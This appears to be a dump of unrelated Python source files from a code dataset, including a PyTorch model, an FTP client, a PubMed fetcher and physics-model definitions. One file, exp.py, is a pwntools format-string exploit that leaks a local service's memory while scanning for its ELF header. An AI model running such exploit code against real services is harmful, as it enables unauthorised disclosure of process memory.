else:\r\n for match in concept['matches']:\r\n if 'aat' in match:\r\n number_matches_dict['AAT'] += 1\r\n elif 'tgn' in match or 'TGN' in match:\r\n number_matches_dict['TGN'] += 1\r\n elif 'mimo' in match:\r\n number_matches_dict['MIMO'] += 1\r\n elif 'wiki' in match:\r\n number_matches_dict['Wiki'] += 1 \r\n elif is_number(match):\r\n number_matches_dict['Numbers'] += 1 \r\n elif 'geonames' in match:\r\n number_matches_dict['Geonames'] += 1\r\n else:\r\n number_matches_dict['other'] += 1\r\n return number_matches_dict\r\n\r\ndef type_analyse(list):\r\n scheme_dict = {}\r\n for concept in list:\r\n schemes = concept['schemes']\r\n for scheme in schemes:\r\n scheme_dict[scheme] = scheme_dict.get(scheme, 0) + 1\r\n return 
scheme_dict","sub_path":"thesaurus/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":27416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"141849898","text":"# -*- coding: utf-8 -*-\n\nimport webapp2\nimport os\nfrom google.appengine.ext.webapp import template\n\nimport user_filter\n\nclass Require(webapp2.RequestHandler):\n def get(self):\n user, nickname = user_filter.do_filter()\n\n self.response.out.write(template.render('html/require.html',\n {\n 'user': user,\n 'nickname': nickname,\n }))\n\n\ndebug = os.environ.get('SERVER_SOFTWARE', '').startswith('Dev')\n \napp = webapp2.WSGIApplication([\n ('/require', Require),\n ], debug=debug)","sub_path":"chap10/option/require.py","file_name":"require.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"598386383","text":"# Reference: https://pytorch.org/vision/stable/_modules/torchvision/models/googlenet.html#googlenet\n\nfrom typing import Any, Callable, List, Optional, Tuple\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import Tensor\n\nfrom model.transformer import Transformer\n\n\nclass TransformerSR(nn.Module):\n\n def __init__(\n self,\n in_channels: int = 3,\n init_weights: Optional[bool] = None,\n blocks: Optional[List[Callable[..., nn.Module]]] = None\n ) -> None:\n super(TransformerSR, self).__init__()\n if blocks is None:\n blocks = [BasicConv2d, MBM]\n\n assert len(blocks) == 2\n conv_block = blocks[0]\n mbm_block = blocks[1]\n\n self.conv1 = conv_block(in_channels, 64, kernel_size=3, stride=1, padding=1)\n self.conv2 = conv_block(64, 192, kernel_size=3, padding=1)\n \n self.mbm3 = mbm_block(192, 128, (96, 164), (96, 164), (64, 96, 96), (64, 128, 128), (64, 128, 128), (64, 64))\n self.maxpool3 = nn.MaxPool2d(2, stride=2, ceil_mode=True)\n self.mbm4 = mbm_block(872, 432, (128, 196), (128, 196), (96, 128, 128), (96, 164, 164), (96, 164, 164), (256, 256))\n self.maxpool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True)\n self.transformers = nn.Sequential(\n Transformer(dim=256, depth=1, heads=4, dim_head=64, mlp_dim=64, dropout=0.2),\n # Transformer(dim=256, depth=3, heads=8, dim_head=64, mlp_dim=64, dropout=0.2),\n )\n\n self.mbm5 = mbm_block(6, 1, (1, 1), (1, 1), (1, 1, 1), (1, 1, 1), (1, 1, 1), (1, 1))\n self.conv6 = nn.Conv2d(7, 3, kernel_size=1)\n\n if init_weights:\n self._initialize_weights()\n\n def _initialize_weights(self) -> None:\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n import scipy.stats as stats\n X = stats.truncnorm(-2, 2, scale=0.01)\n values = torch.as_tensor(X.rvs(m.weight.numel()), dtype=m.weight.dtype)\n values = values.view(m.weight.size())\n with torch.no_grad():\n m.weight.copy_(values)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n\n def forward(self, x: Tensor) -> Tuple[Tensor, Optional[Tensor], Optional[Tensor]]:\n # N x 3 x 64 x 64\n x = self.conv1(x)\n # N x 64 x 64 x 64\n x = self.conv2(x)\n # N x 192 x 64 x 64\n x = self.mbm3(x)\n # N x 872 x 64 x 64\n x = self.maxpool3(x)\n # N x 872 x 32 x 32\n x = self.mbm4(x)\n # N x 1536 x 32 x 32\n x = self.maxpool4(x)\n\n # N x 1536 x 16 x 16\n x = torch.flatten(x, start_dim=2)\n # N x 1536 x 256\n if self.transformers is not None:\n x = self.transformers(x)\n \n # N x 1536 x 256\n x = x.view(-1, 6, 256, 256)\n # N x 6 x 256 x 256\n x = self.mbm5(x)\n # 
N x 7 x 256 x 256\n x = self.conv6(x)\n # N x 3 x 256 x 256\n return x\n\n\nclass MBM(nn.Module):\n\n def __init__(\n self,\n in_channels: int,\n ch_1x1: int,\n ch_1x3: tuple,\n ch_3x1: tuple,\n ch_3x3: tuple,\n ch_3x1d: tuple,\n ch_1x3d: tuple,\n ch_pool: tuple,\n conv_block: Optional[Callable[..., nn.Module]] = None\n ) -> None:\n super(MBM, self).__init__()\n if conv_block is None:\n conv_block = BasicConv2d\n\n self.branch1 = conv_block(in_channels, ch_1x1, kernel_size=1)\n\n self.branch2 = nn.Sequential(\n conv_block(in_channels, ch_1x3[0], kernel_size=1),\n conv_block(ch_1x3[0], ch_1x3[1], kernel_size=(1, 3), padding=(0, 1))\n )\n\n self.branch3 = nn.Sequential(\n conv_block(in_channels, ch_3x1[0], kernel_size=1),\n conv_block(ch_3x1[0], ch_3x1[1], kernel_size=(3,1), padding=(1, 0))\n )\n\n self.branch4 = nn.Sequential(\n conv_block(in_channels, ch_3x3[0], kernel_size=1),\n conv_block(ch_3x3[0], ch_3x3[1], kernel_size=(1,3), padding=(0, 1)),\n conv_block(ch_3x3[1], ch_3x3[2], kernel_size=(3, 1), padding=(1, 0))\n )\n\n self.branch5 = nn.Sequential(\n conv_block(in_channels, ch_3x1d[0], kernel_size=1),\n conv_block(ch_3x1d[0], ch_3x1d[1], kernel_size=(3,1), dilation=2, padding=(2, 0)),\n conv_block(ch_3x1d[1], ch_3x1d[2], kernel_size=1),\n )\n\n self.branch6 = nn.Sequential(\n conv_block(in_channels, ch_1x3d[0], kernel_size=1),\n conv_block(ch_1x3d[0], ch_1x3d[1], kernel_size=(1,3), dilation=2, padding=(0, 2)),\n conv_block(ch_1x3d[1], ch_1x3d[2], kernel_size=1),\n )\n\n self.branch7 = nn.Sequential(\n conv_block(in_channels, ch_pool[0], kernel_size=1),\n nn.MaxPool2d(kernel_size=(3,3), stride=1, padding=1),\n conv_block(ch_pool[0], ch_pool[1], kernel_size=1)\n )\n\n cat_chs = ch_1x1 + ch_1x3[-1] + ch_3x1[-1] + ch_3x3[-1] + ch_3x1d[-1] + ch_1x3d[-1] + ch_pool[-1]\n self.conv1x1 = nn.Conv2d(cat_chs, cat_chs, kernel_size=1)\n self.bn = nn.BatchNorm2d(cat_chs)\n\n def forward(self, x: Tensor) -> Tensor:\n branch1 = self.branch1(x)\n branch2 = self.branch2(x)\n branch3 = self.branch3(x)\n branch4 = self.branch4(x)\n branch5 = self.branch5(x)\n branch6 = self.branch6(x)\n branch7 = self.branch7(x)\n\n outputs = [branch1, branch2, branch3, branch4, branch5, branch6, branch7]\n outputs = torch.cat(outputs, 1)\n outputs = self.bn(self.conv1x1(outputs))\n outputs = self.mish(outputs)\n return outputs\n\n def mish(self, x):\n return x *( torch.tanh(F.softplus(x)))\n\n\nclass BasicConv2d(nn.Module):\n\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n **kwargs: Any\n ) -> None:\n super(BasicConv2d, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)\n self.bn = nn.BatchNorm2d(out_channels, eps=0.001)\n\n def forward(self, x: Tensor) -> Tensor:\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x, inplace=True)\n\n\nif __name__ == '__main__':\n # mbm = MBM(192, 128, (96, 164), (96, 164), (64, 96, 96), (64, 128, 128), (64, 128, 128), (64, 64))\n # print(mbm(torch.randn(4, 192, 64, 64)).shape)\n # print(mbm(torch.randn(4, 192, 32, 32)).shape)\n # mbm2 = MBM(872, 432, (128, 196), (128, 196), (96, 128, 128), (96, 164, 164), (96, 164, 164), (256, 256))\n # print(mbm2(torch.randn(4, 872, 64, 64)).shape)\n # print(mbm2(torch.randn(4, 872, 32, 32)).shape)\n\n net = TransformerSR(3)\n print(net(torch.randn(4, 3, 64, 64)).shape)\n\n\ndef make_model(args):\n return 
TransformerSR(3)\n","sub_path":"codes/model/transformersr.py","file_name":"transformersr.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"401161982","text":"# 🚨 Don't change the code below 👇\nheight = float(input(\"enter your height in m: \"))\nweight = float(input(\"enter your weight in kg: \"))\n# 🚨 Don't change the code above 👆\n\n#Write your code below this line 👇\nbmi = round(weight / (height ** 2))\nmessage = (f\"Your BMI is {bmi}, you are \")\n\nif(bmi < 18.5):\n print(message + \"underweight\")\nelif(bmi >= 18.5 and bmi < 25):\n message = (f\"Your BMI is {bmi}, you have a \")\n print(message + \"normal weight.\")\nelif(bmi >= 25 and bmi < 30):\n print(message + \"slightly overweight.\")\nelif(bmi >= 30 and bmi < 35):\n print(message + \"obese.\")\nelse:\n print(message + \"clinically obese.\")","sub_path":"Beginner/Projects/04_IfElse/CalculateBMI.py","file_name":"CalculateBMI.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"327916330","text":"from pwn import *\n\n\ni=0x8047000\nwhile(1):\n payload=\"%8$x\"+p32(i)\n con=remote(\"127.0.0.1\",9702)\n con.sendline(payload)\n if(not con.can_recv()):\n print(hex(i)+': jump')\n else:\n ret=con.recv()\n print(hex(i)+': '+ret)\n if(ret=='7f454c46' or ret=='464c457f'):\n print('success')\n break\n con.close()\n i=i+8\n sleep(0.2)\n'''\nfor i in range(100):\n con=remote(\"127.0.0.1\",9702)\n payload=(\"abcd%\"+str(i)+\"$x\")\n con.sendline(payload)\n if(con.can_recv()):\n print(str(i)+':'+con.recv())\n else:\n print(str(i)+':crashed')\n con.close()\n sleep(0.5)\n'''\n","sub_path":"mess/leakMemory/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"59855860","text":"from common.model.placepicker.placepicker import PlacePicker\nfrom common.model.rules.rule import Rule\nfrom simulator.gamestate import GameState\n\n\nclass PrepareNewPlaceInPlaceGroup(Rule):\n def __init__(self, place_picker: PlacePicker):\n super().__init__('new place {0}'.format(place_picker.name))\n self.place_picker = place_picker\n self.register_input(self.place_picker)\n\n def apply(self, gamestate: GameState):\n place_group = self.place_picker.submitted()\n place_group.add_new()\n","sub_path":"common/model/rules/preparenewplaceinplacegroup.py","file_name":"preparenewplaceinplacegroup.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"86247335","text":"from Bio import Entrez\r\nfrom Bio import Medline\r\n\r\nEntrez.email = \"pg32943@alunos.uminho.pt\"\r\n\r\n# download the PubMed identifiers of the articles;\r\n# run the search once without retmax first to learn the total number of hits\r\ncount_handle = Entrez.esearch(db = \"pubmed\", term = \"Legionella pneumophila philadelphia 1\")\r\ntotal = Entrez.read(count_handle)[\"Count\"]\r\nhandle = Entrez.esearch(db = \"pubmed\", term = \"Legionella pneumophila philadelphia 1\", retmax=total)\r\nrecord = Entrez.read(handle)\r\nidlist = record[\"IdList\"]\r\n\r\nhandle2 = Entrez.efetch(db=\"pubmed\", id=idlist, rettype=\"medline\", retmode=\"text\")\r\nrecords = list(Medline.parse(handle2))\r\n\r\n# export a file with the articles\r\nrecord_results = open(\"artigos_PubMed.txt\", 'w')\r\nfor record in records:\r\n a1 = \"Title: \" + str(record.get(\"TI\", \"?\")) \r\n a2 = \"\\nAuthors: \" + str(record.get(\"AU\", \"?\")) \r\n a3 = \"\\nSource: \" + str(record.get(\"SO\", \"?\")) \r\n record_results.write(a1)\r\n 
record_results.write(a2)\r\n record_results.write(a3)\r\n record_results.write(\"\\n\\n\")\r\nrecord_results.close()\r\n","sub_path":"src/pubmed_script.py","file_name":"pubmed_script.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"27929522","text":"from tkinter import *\r\n\r\ndef button(textoBotao,info,funcao):\r\n root = Tk()\r\n root.geometry(\"1200x60+0+0\")\r\n root.config(bg=\"#343434\")\r\n root.overrideredirect(1)\r\n root.wm_attributes('-topmost','true')\r\n for i in range(0,len(textoBotao)):\r\n print(i)\r\n var = StringVar()\r\n label = Label( root, textvariable=info )\r\n button= Button(root, text=textoBotao[i],\r\n fg=\"#eeeeee\",bg=\"#343434\",\r\n activebackground=\"#454545\",\r\n font=('', 32), border = \"0\",\r\n compound=\"center\",command=funcao[i])\r\n button.pack(side=LEFT,anchor=NW, expand=NO, fill=NONE)\r\n root.mainloop()\r\n","sub_path":"interface facil/labelfacil.py","file_name":"labelfacil.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"479143562","text":"#!/usr/bin/env python\n#coding:utf-8\n#author Zhang Shijie\n\nimport socket\nimport sys,os\n\n\nclass Client(object):\n\n def __init__(self,ip_addr): #初始化\n self.sock = socket.socket()\n self.sock.connect(ip_addr)\n self.auth_user = self.auth()\n self.local_path = self.auth_user[1]\n self.ser_path = self.auth_user[2]\n if self.auth_user[0] == \"0\":\n self.interactive()\n\n def auth(self): #用户登录认证和锁定家目录\n username = input(\"login#>>\")\n password = input(\"passw#>>\")\n user = \"%s|%s\" % (username,password)\n self.sock.send(bytes(user,\"utf8\"))\n auth_user = self.sock.recv(1024)\n auth_user = str(auth_user,\"utf8\").split(\"|\")\n local_path = auth_user[1]\n ser_path = auth_user[2]\n if auth_user[0] == \"0\":\n print(\"恭喜您登陆成功!\\n您的本地家目录为:%s\\n您的FTP目录为:ftp:\\\\\\%s\" % (local_path,ser_path))\n return auth_user\n else:\n exit()\n\n def interactive(self): #选择操作:下载或者上传\n try:\n while True:\n cmd = input(\"#>>\")\n if len(cmd) == 0:continue\n cmd_new = cmd.split()\n cmd_type = cmd_new[0]\n if cmd_type == \"get\":\n func = getattr(self,cmd_type)\n func(cmd_new)\n elif cmd_type == \"put\":\n func = getattr(self,cmd_type)\n func(cmd_new)\n else:\n print(\"你输入的命令有误,请输入get命令!\")\n except KeyboardInterrupt:\n self.exit('exit')\n except EOFError:\n self.exit('exit')\n\n def get(self,cmd): #下载\n if len(cmd) == 2:\n print(cmd[1])\n file_msg = \"get|%s\" % cmd[1]\n self.sock.send(bytes(file_msg,\"utf8\"))\n ready = self.sock.recv(1024)\n ready = str(ready,\"utf8\")\n if ready.startswith('get_file-->ready'):\n file_size = int(ready.split(\"-->\")[-1])\n cur_path = self.local_path\n os.path.exists(cur_path) or os.mkdir(cur_path)\n filename = os.path.basename(file_msg.split(\"|\")[-1])\n filename = \"%s/%s\" % (cur_path,filename)\n f = open(filename,'wb')\n self.sock.send(bytes('get_file-->recv',\"utf8\"))\n size_recv = 0\n progress_percent = 0\n while not size_recv == file_size:\n data = self.sock.recv(file_size-size_recv)\n size_recv += len(data)\n f.write(data )\n cur_percent = int(float(size_recv) / file_size * 100)\n if cur_percent > progress_percent:\n progress_percent = cur_percent\n else:\n print(\"文件传输完成!\")\n\n else:\n print('接收到的服务器信息为:%s' % ready)\n\n def put(self,cmd): #上传\n if len(cmd) == 2:\n cur_path = self.local_path\n os.path.exists(cur_path) or os.mkdir(cur_path)\n filename = '%s/%s' %(cur_path,cmd[1])\n if 
os.path.isfile(filename):\n file_msg = \"put|%s\" % cmd[1]\n self.sock.send(bytes(file_msg,\"utf8\"))\n file_size = os.path.getsize(filename)\n ready_msg = \"put_file-->ready-->%s\" % file_size\n self.sock.send(bytes(ready_msg,\"utf8\"))\n recv_msg = self.sock.recv(1024)\n recv_msg = str(recv_msg,\"utf8\")\n if recv_msg.startswith(\"put_file-->recv\"):\n f = open(filename,'rb')\n size_left = file_size\n while size_left >0:\n if size_left < 1024:\n self.sock.send(f.read(size_left))\n size_left = 0\n else:\n self.sock.send(f.read(1024))\n size_left -= 1024\n else:\n print(\"文件传输完成!\")\n else:#file doesn't exist\n err_msg = \"%s:没有那个文件或目录!\" % filename\n self.sock.send(bytes(err_msg,\"utf8\"))\n\n\n\n\nif __name__ == \"__main__\":\n ip_addr = ('127.0.0.1', 9003)\n s = Client(ip_addr)\n\n","sub_path":"day8/zuoye/ftpserver/FTPclient/ftpclient.py","file_name":"ftpclient.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"471536737","text":"\"\"\"\nAuthor: Allen B. Liu\nProgram: track_strategy.py\nDate: Friday, January 16, 2015\nDescription: Track Strategy\n\"\"\"\nfrom __future__ import division\nimport datetime\nimport math\nimport pandas as pd\nimport numpy as np\nfrom trading.strategies.strategy import Strategy\nfrom core.event import OrderEvent\n\nclass TrackStrategy(Strategy):\n \n def __init__(self, context, config):\n\n # init base class\n Strategy.__init__(self, context, config)\n \n self.trades = {}\n self.notional = float(config['notional'])\n self.index = config['index']\n self.wavePrepare = datetime.datetime.strptime(\"%s %s\" % (context.date, config['wavePrepare']), \"%Y%m%d %H%M%S\") \n self.waveSend = datetime.datetime.strptime(\"%s %s\" % (context.date, config['waveSend']), \"%Y%m%d %H%M%S\")\n \n self.context.eventmanager.create_wave(self.name + \"Prepare\", self.wavePrepare) \n self.context.eventmanager.create_wave(self.name + \"Send\", self.waveSend) \n \n self.composition = self.context.universe.indexcomp.loc[self.index]\n #self.composition['weight'] = (((self.composition['shares'] / self.composition['divisor']) * self.composition['price']) / self.composition['total']) * 100.0\n\n \n def handle_event(self, event):\n Strategy.handle_event(self, event) # call base\n if event.type == \"TIMER\":\n if event.name == (self.name + \"Prepare\"):\n self.prepare_basket(event.datetime) \n if event.name == (self.name + \"Send\"):\n self.send_basket(event.datetime)\n \n def prepare_basket(self, time):\n # compute desired weights\n for ticker in self.composition.index:\n lotsize = self.context.universe.findLotSize(ticker)\n if np.isnan(self.composition.loc[ticker]['weight']) or np.isnan(self.composition.loc[ticker]['price']):\n target = 0\n else:\n shares = (self.notional * (self.composition.loc[ticker]['weight']*0.01)) / self.composition.loc[ticker]['price']\n target = int(round(shares / lotsize, 0) * lotsize)\n \n # check limits\n current = self.portfolio.positions[ticker]['net']\n trade_qty = int(target - current)\n self.trades[ticker] = trade_qty \n \n def send_basket(self, time):\n for ticker,trade_qty in self.trades.items(): \n if trade_qty > 0:\n self.context.eventmanager.publish(OrderEvent(ticker, time, 'MKT', trade_qty, 'BUY'))\n elif trade_qty < 0:\n self.context.eventmanager.publish(OrderEvent(ticker, time, 'MKT', abs(trade_qty), 'SELL')) \n \n def close(self):\n Strategy.close(self) 
","sub_path":"trading/strategies/track_strategy.py","file_name":"track_strategy.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"586408994","text":"from questionnaire.models import Questionnaire, Section, SubSection, Question, QuestionGroup, QuestionOption, \\\n QuestionGroupOrder\n\nquestionnaire = Questionnaire.objects.get(name=\"JRF Core English\", description=\"From dropbox as given by Rouslan\")\n\nsection_1 = Section.objects.create(order=5, questionnaire=questionnaire, name=\"Coverage Surveys\",\n title=\"Immunization and Vitamin A Coverage\")\n\nsub_section = SubSection.objects.create(order=1, section=section_1, title=\"Conducted in 2011-2013\")\n\nquestion1 = Question.objects.create(text=\"Year of most recent survey\", UID='C00066', answer_type='MultiChoice',\n export_label='When was the most recent survey conducted?',\n instructions=\"If a coverage survey or other surveys with immunization modules have been conducted from 2011 onwards, indicate whenit took place (if more than one survey took place during this time period, select the latest most recent one)?\")\n\nQuestionOption.objects.create(text=\"2011\", question=question1)\nQuestionOption.objects.create(text=\"2012\", question=question1)\nQuestionOption.objects.create(text=\"2013\", question=question1)\n\nquestion2 = Question.objects.create(text=\"Full title of survey in the language of the original report\",\n export_label='Full title of survey in the language of the original report',\n UID='C00067', answer_type='Text')\nquestion3 = Question.objects.create(text=\"Full title of survey in English\", UID='C00068', answer_type='Text',\n export_label='Full title of survey in English')\n\nparent1 = QuestionGroup.objects.create(subsection=sub_section, order=1)\nparent1.question.add(question3, question2, question1)\nQuestionGroupOrder.objects.create(question=question1, question_group=parent1, order=1)\nQuestionGroupOrder.objects.create(question=question2, question_group=parent1, order=2)\nQuestionGroupOrder.objects.create(question=question3, question_group=parent1, order=3)\n\nsub_section1 = SubSection.objects.create(order=2, section=section_1, title=\"Planned for 2014-2015\")\nquestion_1 = Question.objects.create(text=\"Is a coverage survey planned for the next 24 months?\", UID='C00069',\n export_label='Is a coverage survey planned for the next 24 months?',\n answer_type='MultiChoice', instructions=\"\")\n\nQuestionOption.objects.create(text=\"Yes\", question=question_1)\nQuestionOption.objects.create(text=\"No\", question=question_1)\n\nquestion_2 = Question.objects.create(text=\"What type of survey is planned? (e.g., MICS, DHS, EPI or CES)\",\n export_label='What type of survey is planned? 
(e.g., MICS, DHS, EPI or CES)',\n UID='C00070', answer_type='Text')\n\nparent2 = QuestionGroup.objects.create(subsection=sub_section1, order=1)\nparent2.question.add(question_1, question_2)\nQuestionGroupOrder.objects.create(question=question_1, question_group=parent2, order=1)\nQuestionGroupOrder.objects.create(question=question_2, question_group=parent2, order=2)\n\n\n# ############################################ GENERATE FIXTURES\n# questionnaires = Questionnaire.objects.all()\n# sections = Section.objects.all()\n# subsections = SubSection.objects.all()\n# questions = Question.objects.all()\n# question_groups = QuestionGroup.objects.all()\n# options = QuestionOption.objects.all()\n# orders = QuestionGroupOrder.objects.all()\n\n# data = serializers.serialize(\"json\", [questionnaires])\n# print data\n\n# data = serializers.serialize(\"json\", [sections])\n# print data\n\n# data = serializers.serialize(\"json\", [subsections])\n# print data\n#\n# data = serializers.serialize(\"json\", [questions])\n# print data\n#\n# data = serializers.serialize(\"json\", [question_groups])\n# print data\n#\n# data = serializers.serialize(\"json\", [options, orders])\n# print data","sub_path":"questionnaire/fixtures/questionnaire/section_4b.py","file_name":"section_4b.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"244258499","text":"import random\nword_list = [\"arward\",\"baboon\",\"camel\"]\nchosen_word = random.choice(word_list)\n\nguess = input(\" Guess a word : \").lower()\n\nfor letter in chosen_word:\n if letter == guess :\n print(\" Right ! \")\n else :\n print(\"wrong !\") \n \n","sub_path":"random_choose_aWord.py","file_name":"random_choose_aWord.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"162344289","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by HazzaCheng on 2020-09-30\n# https://leetcode.com/problems/maximal-square/\nfrom typing import List\n\n\nclass Solution:\n # solution 1\n def maximalSquare1(self, matrix: List[List[str]]) -> int:\n if matrix is None or len(matrix) < 1:\n return 0\n m, n = len(matrix), len(matrix[0])\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n maxSide = 0\n\n for i in range(m):\n for j in range(n):\n if matrix[i][j] == '1':\n dp[i + 1][j + 1] = min(dp[i + 1][j], dp[i][j + 1], dp[i][j]) + 1\n maxSide = max(maxSide, dp[i + 1][j + 1])\n\n return maxSide ** 2\n\n # solution 2\n def maximalSquare2(self, matrix: List[List[str]]) -> int:\n if matrix is None or len(matrix) < 1:\n return 0\n m, n = len(matrix), len(matrix[0])\n dp = [0] * (n + 1)\n maxSide = 0\n\n for i in range(m):\n topLeft = dp[0]\n for j in range(n):\n temp = dp[j + 1]\n if matrix[i][j] == '1':\n dp[j + 1] = min(dp[j], dp[j + 1], topLeft) + 1\n else:\n dp[j + 1] = 0\n topLeft = temp\n maxSide = max(maxSide, dp[j + 1])\n\n return maxSide ** 2\n","sub_path":"python/src/dp/No221_Maximal_Square.py","file_name":"No221_Maximal_Square.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"69750037","text":"# This file was automatically created by FeynRules 2.3.26\n# Mathematica version: 10.3.1 for Mac OS X x86 (64-bit) (December 9, 2015)\n# Date: Sun 3 Sep 2017 23:30:31\n\n\nfrom object_library import all_lorentz, Lorentz\n\nfrom function_library import complexconjugate, re, im, csc, sec, acsc, 
asec, cot\ntry:\n import form_factors as ForFac \nexcept ImportError:\n pass\n\n\nUUV3 = Lorentz(name = 'UUV3',\n spins = [ -1, -1, 3 ],\n structure = 'P(3,2) + P(3,3)')\n\nSSS3 = Lorentz(name = 'SSS3',\n spins = [ 1, 1, 1 ],\n structure = '1')\n\nFFS3 = Lorentz(name = 'FFS3',\n spins = [ 2, 2, 1 ],\n structure = 'P(-1,1)*Gamma(-1,2,1) - P(-1,2)*Gamma(-1,2,1)')\n\nFFS4 = Lorentz(name = 'FFS4',\n spins = [ 2, 2, 1 ],\n structure = 'Identity(2,1)')\n\nFFS5 = Lorentz(name = 'FFS5',\n spins = [ 2, 2, 1 ],\n structure = 'P(-1,1)*Gamma(-1,2,-2)*ProjM(-2,1)')\n\nFFS6 = Lorentz(name = 'FFS6',\n spins = [ 2, 2, 1 ],\n structure = 'P(-1,2)*Gamma(-1,2,-2)*ProjM(-2,1)')\n\nFFS7 = Lorentz(name = 'FFS7',\n spins = [ 2, 2, 1 ],\n structure = 'P(-1,1)*Gamma(-1,2,-2)*ProjM(-2,1) - P(-1,2)*Gamma(-1,2,-2)*ProjM(-2,1)')\n\nFFS8 = Lorentz(name = 'FFS8',\n spins = [ 2, 2, 1 ],\n structure = 'ProjM(2,1) + ProjP(2,1)')\n\nFFV9 = Lorentz(name = 'FFV9',\n spins = [ 2, 2, 3 ],\n structure = 'Gamma(3,2,1)')\n\nFFV10 = Lorentz(name = 'FFV10',\n spins = [ 2, 2, 3 ],\n structure = 'Gamma(3,2,-1)*ProjM(-1,1)')\n\nFFV11 = Lorentz(name = 'FFV11',\n spins = [ 2, 2, 3 ],\n structure = 'Gamma(3,2,-1)*ProjP(-1,1)')\n\nVVS3 = Lorentz(name = 'VVS3',\n spins = [ 3, 3, 1 ],\n structure = 'P(1,1)*P(2,1) + 2*P(1,1)*P(2,2) + P(1,2)*P(2,2)')\n\nVVS4 = Lorentz(name = 'VVS4',\n spins = [ 3, 3, 1 ],\n structure = 'Metric(1,2)')\n\nVVV3 = Lorentz(name = 'VVV3',\n spins = [ 3, 3, 3 ],\n structure = 'P(3,1)*Metric(1,2) - P(3,2)*Metric(1,2) - P(2,1)*Metric(1,3) + P(2,3)*Metric(1,3) + P(1,2)*Metric(2,3) - P(1,3)*Metric(2,3)')\n\nSSSS3 = Lorentz(name = 'SSSS3',\n spins = [ 1, 1, 1, 1 ],\n structure = '1')\n\nFFVS1 = Lorentz(name = 'FFVS1',\n spins = [ 2, 2, 3, 1 ],\n structure = 'Gamma(3,2,1)')\n\nFFVS2 = Lorentz(name = 'FFVS2',\n spins = [ 2, 2, 3, 1 ],\n structure = 'Gamma(3,2,-1)*ProjM(-1,1)')\n\nFFVS3 = Lorentz(name = 'FFVS3',\n spins = [ 2, 2, 3, 1 ],\n structure = 'Gamma(3,2,-1)*ProjM(-1,1) - 2*Gamma(3,2,-1)*ProjP(-1,1)')\n\nFFVS4 = Lorentz(name = 'FFVS4',\n spins = [ 2, 2, 3, 1 ],\n structure = 'Gamma(3,2,-1)*ProjM(-1,1) + 2*Gamma(3,2,-1)*ProjP(-1,1)')\n\nFFVS5 = Lorentz(name = 'FFVS5',\n spins = [ 2, 2, 3, 1 ],\n structure = 'Gamma(3,2,-1)*ProjM(-1,1) + 4*Gamma(3,2,-1)*ProjP(-1,1)')\n\nVVSS8 = Lorentz(name = 'VVSS8',\n spins = [ 3, 3, 1, 1 ],\n structure = 'Metric(1,2)')\n\nVVVV11 = Lorentz(name = 'VVVV11',\n spins = [ 3, 3, 3, 3 ],\n structure = 'Metric(1,4)*Metric(2,3) - Metric(1,3)*Metric(2,4)')\n\nVVVV12 = Lorentz(name = 'VVVV12',\n spins = [ 3, 3, 3, 3 ],\n structure = 'Metric(1,4)*Metric(2,3) + Metric(1,3)*Metric(2,4) - 2*Metric(1,2)*Metric(3,4)')\n\nVVVV13 = Lorentz(name = 'VVVV13',\n spins = [ 3, 3, 3, 3 ],\n structure = 'Metric(1,4)*Metric(2,3) - Metric(1,2)*Metric(3,4)')\n\nVVVV14 = Lorentz(name = 'VVVV14',\n spins = [ 3, 3, 3, 3 ],\n structure = 'Metric(1,3)*Metric(2,4) - Metric(1,2)*Metric(3,4)')\n\nVVVV15 = Lorentz(name = 'VVVV15',\n spins = [ 3, 3, 3, 3 ],\n structure = 'Metric(1,4)*Metric(2,3) - (Metric(1,3)*Metric(2,4))/2. 
